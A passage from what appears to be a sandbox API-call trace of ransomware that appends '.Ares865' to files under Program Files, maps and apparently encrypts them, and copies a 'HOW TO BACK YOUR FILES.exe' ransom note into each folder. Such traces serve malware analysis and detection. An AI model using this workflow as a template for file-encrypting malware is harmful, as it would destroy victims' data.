(lpExistingFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\msdatasrc.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\msdatasrc.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\msdatasrc.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\msdatasrc.dll.ares865"), dwFlags=0x1) returned 1 [0128.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\msdatasrc.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\msdatasrc.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.481] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4096) returned 1 [0128.481] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.482] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.482] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.482] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1300, lpName=0x0) returned 0x170 [0128.483] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1300) returned 0x190000 [0128.484] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.485] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.485] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.486] lstrcpyW (in: lpString1=0x2cce480, lpString2="stdole.dll" | out: lpString1="stdole.dll") returned="stdole.dll" [0128.486] lstrlenW (lpString="stdole.dll") returned 10 [0128.486] lstrlenW (lpString="Ares865") returned 7 [0128.486] lstrcmpiW (lpString1="ole.dll", lpString2="Ares865") returned 1 [0128.486] lstrlenW (lpString=".dll") returned 4 [0128.486] lstrcmpiW (lpString1="stdole.dll", lpString2=".dll") returned 1 [0128.486] lstrlenW (lpString=".lnk") returned 4 [0128.486] lstrcmpiW (lpString1="stdole.dll", lpString2=".lnk") returned 1 [0128.486] lstrlenW (lpString=".ini") returned 4 [0128.486] lstrcmpiW (lpString1="stdole.dll", lpString2=".ini") returned 1 [0128.486] lstrlenW (lpString=".sys") returned 4 [0128.486] lstrcmpiW (lpString1="stdole.dll", lpString2=".sys") returned 1 [0128.486] lstrlenW (lpString="stdole.dll") returned 10 [0128.486] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\stdole.dll.Ares865") returned 82 [0128.486] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\stdole.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\stdole.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\stdole.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\stdole.dll.ares865"), dwFlags=0x1) returned 1 [0128.488] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\stdole.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\stdole.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.488] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16384) returned 1 [0128.488] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.489] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.489] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.489] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x170 [0128.491] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x190000 [0128.492] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.493] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.493] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.494] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8" [0128.494] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8" [0128.494] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.494] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.495] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.495] GetLastError () returned 0x0 [0128.495] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.496] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x525207a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x525207a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.496] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.496] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.496] lstrcpyW (in: lpString1=0x2cce462, lpString2="Common7" | out: lpString1="Common7") returned="Common7" [0128.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0128.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1708 [0128.496] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0128.496] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525207a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x525207a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.496] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.496] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x52546900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52546900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SDK", cAlternateFileName="")) returned 1 [0128.496] lstrcmpiW (lpString1="SDK", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.496] lstrcmpiW (lpString1="SDK", lpString2="aoldtz.exe") returned 1 [0128.496] lstrcpyW (in: lpString1=0x2cce462, lpString2="SDK" | out: lpString1="SDK") returned="SDK" [0128.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0128.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2e4710 [0128.496] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0128.496] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x525207a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x525207a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 1 [0128.496] lstrcmpiW (lpString1="VSTA", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.497] lstrcmpiW (lpString1="VSTA", lpString2="aoldtz.exe") returned 1 [0128.497] lstrcpyW (in: lpString1=0x2cce462, lpString2="VSTA" | out: lpString1="VSTA") returned="VSTA" [0128.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0128.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2e4788 [0128.497] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0128.497] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x525207a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x525207a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 0 [0128.497] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.497] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0128.497] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA" [0128.497] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA" [0128.497] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.497] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.498] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.498] GetLastError () returned 0x0 [0128.499] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.499] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x525207a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x525207a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.499] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.499] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.499] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Bin" | out: lpString1="Bin") returned="Bin" [0128.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0128.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1788 [0128.499] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0128.499] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525207a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x525207a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.499] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.499] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525207a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x525207a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0128.499] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.499] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0128.499] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin" [0128.500] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin" [0128.500] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.500] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.500] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.501] GetLastError () returned 0x0 [0128.501] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.501] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x525207a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x525207a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.501] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.501] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.501] lstrcpyW (in: lpString1=0x2cce474, lpString2="1033" | out: lpString1="1033") returned="1033" [0128.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0128.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f00d8 [0128.502] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0128.502] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525207a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x525207a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.502] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.502] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x557a0300, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x527793d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x557a0300, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x11348, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTAClientPkg.dll", cAlternateFileName="VSTACL~1.DLL")) returned 1 [0128.502] lstrcmpiW (lpString1="VSTAClientPkg.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.502] lstrcmpiW (lpString1="VSTAClientPkg.dll", lpString2="aoldtz.exe") returned 1 [0128.502] lstrcpyW (in: lpString1=0x2cce474, lpString2="VSTAClientPkg.dll" | out: lpString1="VSTAClientPkg.dll") returned="VSTAClientPkg.dll" [0128.502] lstrlenW (lpString="VSTAClientPkg.dll") returned 17 [0128.502] lstrlenW (lpString="Ares865") returned 7 [0128.502] lstrcmpiW (lpString1="Pkg.dll", lpString2="Ares865") returned 1 [0128.502] lstrlenW (lpString=".dll") returned 4 [0128.502] lstrcmpiW (lpString1="VSTAClientPkg.dll", lpString2=".dll") returned 1 [0128.502] lstrlenW (lpString=".lnk") returned 4 [0128.502] lstrcmpiW (lpString1="VSTAClientPkg.dll", lpString2=".lnk") returned 1 [0128.502] lstrlenW (lpString=".ini") returned 4 [0128.502] lstrcmpiW (lpString1="VSTAClientPkg.dll", lpString2=".ini") returned 1 [0128.502] lstrlenW (lpString=".sys") returned 4 [0128.502] lstrcmpiW (lpString1="VSTAClientPkg.dll", lpString2=".sys") returned 1 [0128.502] lstrlenW (lpString="VSTAClientPkg.dll") returned 17 [0128.502] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll.Ares865") returned 83 [0128.503] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaclientpkg.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaclientpkg.dll.ares865"), dwFlags=0x1) returned 1 [0128.504] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaclientpkg.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.505] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=70472) returned 1 [0128.505] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0128.505] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.506] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0128.506] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11650, lpName=0x0) returned 0x170 [0128.507] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11650) returned 0x190000 [0128.511] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0128.512] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.512] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0128.513] lstrcpyW (in: lpString1=0x2cce474, lpString2="VSTAProject.dll" | out: lpString1="VSTAProject.dll") returned="VSTAProject.dll" [0128.513] lstrlenW (lpString="VSTAProject.dll") returned 15 [0128.513] lstrlenW (lpString="Ares865") returned 7 [0128.513] lstrcmpiW (lpString1="ect.dll", lpString2="Ares865") returned 1 [0128.513] lstrlenW (lpString=".dll") returned 4 [0128.513] lstrcmpiW (lpString1="VSTAProject.dll", lpString2=".dll") returned 1 [0128.514] lstrlenW (lpString=".lnk") returned 4 [0128.514] lstrcmpiW (lpString1="VSTAProject.dll", lpString2=".lnk") returned 1 [0128.514] lstrlenW (lpString=".ini") returned 4 [0128.514] lstrcmpiW (lpString1="VSTAProject.dll", lpString2=".ini") returned 1 [0128.514] lstrlenW (lpString=".sys") returned 4 [0128.514] lstrcmpiW (lpString1="VSTAProject.dll", lpString2=".sys") returned 1 [0128.514] lstrlenW (lpString="VSTAProject.dll") returned 15 [0128.514] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll.Ares865") returned 81 [0128.514] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaproject.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaproject.dll.ares865"), dwFlags=0x1) returned 1 [0128.516] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaproject.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.516] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=304456) returned 1 [0128.516] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0128.517] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.517] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0128.517] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4a850, lpName=0x0) returned 0x170 [0128.518] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a850) returned 0x420000 [0128.580] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0128.581] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.581] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0128.586] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 